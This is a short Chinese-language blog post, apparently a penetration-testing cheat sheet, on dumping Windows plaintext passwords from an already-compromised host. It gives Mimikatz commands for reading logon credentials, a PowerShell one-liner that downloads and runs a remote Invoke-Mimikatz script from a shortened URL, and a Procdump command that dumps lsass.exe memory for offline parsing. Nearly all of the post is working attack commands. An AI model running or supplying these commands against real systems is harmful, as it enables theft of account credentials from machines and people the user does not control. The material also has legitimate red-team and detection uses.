这篇文章上次修改于 278 天前,可能其部分内容已经发生变化,如有疑问可询问作者。


1.Mimikatz

作者的博客https://blog.gentilkiwi.com/mimikatz     

直达下载地址https://github.com/gentilkiwi/mimikatz


一个通过系统调试,可以直接抓取系统内明文密码的程序。


只能本地权限运行,方法:


第一条:privilege::debug //提升权限
第二条:sekurlsa::logonpasswords  //获取密码



powershell调用mimikatz提取密码:

powershell "IEX (New-Object Net.WebClient).DownloadString('https://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"



2.prodump

       因为mimikatz一般都是登录的远程服务器本地运行。当我们只有shell,而shell又足够大,没有登录3389的需求时,可以使用微软的prodump导出lsass.exe进程,下载回来然后本地导入mimikatz获取明文密码。


NT5以上使用微软的Procdump工具


Procdump: https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx


操作命令:

Procdump.exe -accepteula -ma lsass.exe lsass.dmp




之后我们就可以得到远程机器的明文密码了。命令如下:

>>mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmp
Switch to MINIDUMP

>>mimikatz # sekurlsa::logonPasswords full